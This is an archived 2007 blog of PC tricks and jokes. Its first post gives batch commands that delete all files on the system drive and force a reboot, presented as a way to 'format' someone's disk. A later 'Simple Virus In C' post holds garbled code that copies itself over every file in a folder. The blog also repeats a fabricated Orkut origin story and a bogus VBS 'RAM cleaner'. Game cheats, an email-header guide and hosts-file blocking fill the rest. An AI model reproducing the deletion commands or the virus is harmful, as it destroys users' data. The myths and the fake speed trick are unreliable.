Friday, December 14, 2007

Formatting Your Hard disk Using Notepad

go to notepad
@Echo off
Del C:\ *.*y
save it as Dell.bat

or worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file

Cheats For Windows Built-in Games

Minesweeper
Secret - Reveal Mines
Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.
Pinball
Secret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.
Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate the Gravity Well.
Secret - Instant PromotionInstructions - Type rmax at the start of a new game to go up in ranks.
Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:
First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 points
Secret - Test ModeInstructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.
Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting
FreeCell
Secret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.
Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game modes.
Solitaire
Secret - Instant Win
Instructions - Press Alt + Shift + 2 during game play to instantly win.
Secret - Draw single cards in a Draw Three game
Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.
Infinite Points
In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!
Infinite points trick II
To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game’s score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.
//—————————————————————–// registry hack which will allow you to see your opponents’ cards//—————————————————————– Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to “ZB” (without the quotes); give it a value of “42″ (again, sans quotes). The next time When you’re in a game of Hearts, press CTRL + SHIFT + ALT + F12.

Simple Virus In C Language

/*this is a program to create a virus in c
it will create folder in a folder in a folder and so on
run this on your own responsibility (at your own risk)*/

#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS
Terminator(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Find Sender's IP Address From Received Mail

We All think that we know Everything About Emails But I'm Not Sure

we know how to compose email , how to attach a file , how to send it to others ,How to receive emails from others and many other things.This is all we know about emails.But this is not end of it .When you receive or send emails many other things are sent with it.

At this time when Email is progressively used for business and for many purposes, not to mention it is being used for phishing and other malicious intentions. It is of utmost priority to understand the other "messages" besides what has been sent or received by you.

Every email comes with a “Header” which is one part of an e-mail structure; call it DNA of the mail. It carries the basic fundamental information such as from whom the email comes, to whom it is addressed, date/time it was sent and the subject of the email. It is similar to an electronic postSeptemberk. Moreover, it also carries other detailed information which we usually don’t see.

This basic information comes in all brief/basic headers that most email programs automatically shows. This detail technical information can be viewed in a full header. All email programs can be set to show only brief header or full header and it is up to the users to set the program whether to view only “brief header” or “full header”.

Full header carries the information of the mail server’s name that the email passed through on its way to the recipient, and sender's IP address and even the name of the email program and its version used.

Knowledge of this information is essential for analysis and investigation purposes on cases involving email abuse, spamming, harassment, forgeries and mail-bombing. It is worth mentioning, understanding of this tool would definitely help people to counter these attacks, and save themselves from unwarranted consequences. Well, this information could not be found in a brief header.

Here we will take the case of Google mail and Yahoo mail to find out the full header.

Google Mail.

Using your id/password, login to Gmail. Open the mail for which you wish to find the full header of the sender. Click on the inverted triangle placed just next to Reply.

You will get something like this…

Delivered-To: Mr.x@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September 2007 15:11:47 -0800 (PST)
Return-Path:
Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2007.03.12.15.11.46; Tue, 12 September 2007 15:11:47 -0800 (PST)
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST
Date: Tue, 12 September 2007 15:11:45 -0800 (PST)
From: Mr.y
Subject: Hello
To: Mr.x

In the example, headers are added to the message three times:

1. When Mr.y composes the email

Date: Tue, 12 September 2007 15:11:45 -0800 (PST)
From: Mr .y
Subject: Hello
To: Mr.x
2. When the email is sent through the servers of Mr.y's email provider, mail.emailprovider.com

Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST

3.When the message transfers from Mr.y 's email provider to Mr. x's Gmail account

Delivered-To: Mr.x@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb;Tue, 12 September 2007 15:11:47 -0800 (PST)

Return-Path: Mr.y@emailprovider.com
Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb; Tue, 12 September 2007 15:11:47 -0800 (PST)

Below is a description of each section of the email header:

Delivered-To: Mr.x@gmail.com

The email address the message will be delivered to.

Received: by 10.36.81.3 with SMTP id e3cs239nzb;
Tue, 29 Mar 2005 15:11:47 -0800 (PST)

The time the message reached Gmail's servers.

Return-Path:

The address from which the message was sent.

Received: from mail.emailprovider.com
(mail.emailprovider.com [111.111.11.111])
by mx.gmail.com with SMTP id h19si826631rnb.2005.03.29.15.11.46;
Tue, 29 Mar 2005 15:11:47 -0800 (PST)

The message was received from mail.emailprovider.com, by a Gmail server on March 29, 2005 at approximately 3 pm.

Message-ID: 20050329231145.62086.mail@mail.emailprovider.com

A unique number assigned by mail.emailprovider.com to identify the message.

Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar 2005 15:11:45 PST

Mr.y used an email composition program to write the message, and it was then received by the email servers of mail.emailprovider.com.

Date: Tue, 29 Mar 2005 15:11:45 -0800 (PST)
From: Mr y
Subject: Hello
To: Mr.x

The date, sender, subject, and destination -- Mr. Jones entered this information (except for the date) when he composed the email.

And for IP, look for Received:from followed by the IP within square brackets [ ] e.g.

Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12

Also importantly, there are times when you might find multiple Received: from entries, in that case, please select the last one as the valid choice.

Airtel Tune In C Language

HEADERS FILES ARE AND (include these files yourself in below program)

float main(void)
{
float A,Bb,D,G,F;
A = 440;
G = 780;
Bb = 461;
D = 586;
F = 687;
sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 1
sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 2
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
return 0;
}

View Movie In Paint

Start movie in Paint!

* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on
your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint!

Creating Custom Sprays In Counter-Strike 1.6

Create custom Counter Strike 1.6 sprays

Stuff's you need are Counter Strike 1.6 and tool called HlTagConverter

I assume that you already have Counter Strike 1.6 , so here's the download link to
HlTagConverter:

Click Here

Download and unzip HlTagConverter_014.zip

I think we are ready to start..

1. Create your image and save it to your hard drive (anywhere you want)

2. Open HlTagConverter by double-clicking it

3. Click button that says "1. Open Image" (it's the only active button at this point,
or at least it should be! Very Happy)

4. Ok now browse to where you saved your image and open it, you should see
your image in the HlTagConverter program and on the right corner some
random information of your image

5. So, we opened the picture, what next? Click the second button that says
"2. Adjust Image" (and it should be only active button at this point)
You see some adjustment options, your don't have to change them necessarily
if you don't want to and I don't really even recommend to change adjust options
since they are good at default.. Notice you can't make the images bigger than
96*112 but smaller it is possible.. Ok lets move on.. Now click "AutoSize" button
on the right corner..

6. Then simply click "Apply changes and convert to 256 colors" button

7. Now basically you are done.. Click "3. Save Tag" button and you get some
weird pop-up window, right? Okok don't worry, just select the "Export to WAD
file" and click OK....

8. Now browse to InstallHardDrive:\InstallDirectory(Normally Program
Files)\Steam\SteamApps\USERNAME\counter-strike\cstrike\
you might want to create folder called "Sprays" where you place all you sprays
by simply right-clicking on blank area and choose new -> folder, save your image
as Spray1.
Ok Now browse to this folder and copy (ctrl+c OR right-click -> copy) the
Spray1.wad file to \cstrike\ folder (You can "paste" it by clicking ctrl+v or
right-click -> Paste) and delete old tempdecal.wad file and rename
your Spray1.wad to tempdecal.wad and right-click on it and goto Properties and
then choose "Read Only"..
You can now close all the folders and programs..

That's It Folks

Block Sites Without Any S/W

Block webSites without any Softwares !!!!!!

Steps To Follow :

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site
will no longer be accessable.
5] Done!

example :

127.0.0.1 localhost
127.0.0.2 www.wordpress.com

www.wordpress.com is now unaccessable


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE:
127.0.0.3 www.Dell.com
127.0.0.4 www.Sony.com
127.0.0.5 www.Vodafone.com

This also works with banner sites, just find the host name of the server with the banners and do the same thing with that addy.

Hoep this small tutorial could keep you going in simple way of blocking websites

Increase The Speed Of Your PC

Clean Ur RAM

U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it ..
"RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs

[You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".

FreeMem=Space(1280000000)

It Worked For Me........

Shutdown Your Pc In One Click

One Click Shutdown

Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in "Type Location of the Item"

SHUTDOWN -s -t 01

If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

Shutdown Your Pc In One Click

One Click Shutdown :-


Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in "Type Location of the Item"

SHUTDOWN -s -t 01

If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

Thursday, December 13, 2007

Orkut Story

The Orkut Story

A guy lost his girlfriend in a train accident,but the girl’s name nowhere appeared in the dead list. This guy grew up and became an IT technical architect in his late 20's, achievement in itself!!He hired developers from the whole globe and plan to make a software where he could search for his GF through the web.Things went as planned and he found her, after losing millions of dollars and 3 long years!!

It was time to shut down the search operation, when the CEO of Google had a word with this guy and took over this application.This Software made a whopping 1 billion dollars profit in its first year,which we today know as ORKUT.

The guy’s name is ORKUT BUYUKKOTEN.

Yes its named after him only.Today he is paid a hefty sum by Google for the things we do like scrapping.

He is expected to be the richest person by 2009.

ORKUT BUYUKKOTEN today has 13 assistants to monitor his scrapbook & 8 to monitor his friends-list. He gets around 20,000 friend-requests a day & about 85,000 scraps!!!

Some more interesting facts about him

* He gets $12 from Google when every person registers to this website.

* He also gets $10 when you add somebody as a friend.

* He gets $8 when your friend’s friend adds you as a friend & gets $6 if

anybody adds you as friend in the resulting chain.

* He gets $5 when you scrap somebody & $4 when somebody scraps you.

* He also gets $200 for each photograph you upload on Orkut.

* He gets $2.5 when you add your friend in the crush-list or in the hot-list.

* He gets $2 when you become somebody’s fan.

* He gets $1.5 when somebody else becomes your fan.

* He even gets $1 every time you logout of Orkut.

* He gets $0.5 every time you just change your profile-photograph.

* He also gets $0.5 every time you read your friend’s scrap-book & $0.5 every time you view your friend’s friend-list.

“Moral of the story”?
LOSE U R GIRLFRIEND AND MAKE BILLIONS !!!!

I dont know if its real or unreal, its very much of a Filmy type thing.

Who knows?? :P

Well...

you can take a look at Orkut Büyükkökten (Orkuts) official profile on Orkut.. :D yourself if ya don't beleive me..................

Sunday, December 2, 2007

General Motors Replies To Microsoft

A Real Incident :
At a recent computer expo (COMDEX), Bill Gates reportedly compared the
computer industry with the auto industry and stated,

"If GM had kept up with technology like the computer industry has, we
Would all be driving $25.00 cars that got 1,000 miles to the gallon"
In response to Bill's comments, General Motors issued a press release stating:
"If GM had developed technology like microsoft, we would all be driving
cars with the following characteristics (
and I just love this part, esp 10th point):
1. For no reason whatsoever, your car would crash twice a day.
2. Every time they repainted the lines in the road, you would have to
buy a new car.
3. Occasionally your car would die on the freeway for no reason. You
would have to pull to the side of the road, close all of the windows,
shut off the car, restart it, and reopen the windows before you could
continue. For some reason you would simply accept this.
4. Occasionally, executing a maneuver such as a left turn would cause
your car to shut down and refuse to restart, in which case you would
have to reinstall the engine.
5. Macintosh would make a car that was powered by the sun, was reliable,
five times as fast and twice as easy to drive - but would ! run on only
five percent of the roads.
6. The oil, water temperature, and alternator warning lights would all
be replaced by a single "This Car Has Performed an Illegal Operation"
warning light.
7. The airbag system would ask "Are you sure?" before deploying.
8. Occasionally, for no reason whatsoever, your car would lock you out
and refuse to let you in until you simultaneously lifted the door
handle, turned the key and grabbed hold of the radio antenna.
9. Every time a new car was introduced car buyers would have to learn
how to drive all over again because none of the controls would operate in
the same manner as the old car.
10. You'd have to press the "Start" button to turn the engine off. "